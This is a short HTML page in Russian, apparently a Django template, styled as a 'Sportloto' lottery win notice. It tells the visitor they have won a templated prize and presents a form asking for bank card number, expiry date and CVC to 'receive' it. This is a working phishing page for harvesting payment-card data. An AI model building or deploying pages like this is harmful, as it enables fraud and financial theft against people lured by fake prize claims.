<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
        "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
    <title>ВЫИГРЫШИ</title>
</head>
<body>
<div align="center">
    <h1>СПОРТЛОТО</h1>
<img src="https://pp.userapi.com/c851136/v851136078/1694eb/FoFFMbf3i7k.jpg">
    <p><i>Вы выиграли</i> <b>{{prize}}</b> </p>
<p>Чтобы получить ваш приз, введите данные вашей банковской карты:</p>
<form method="post">
    {% csrf_token %}
    <input name="card" placeholder="Номер карты">
    <input name="date" placeholder="Дата действия">
    <input name="cvc" placeholder="CVC">
    <input type="submit" value="ОК">
</form>
    <p>{{result}}</p>
</div>
</body>
</html>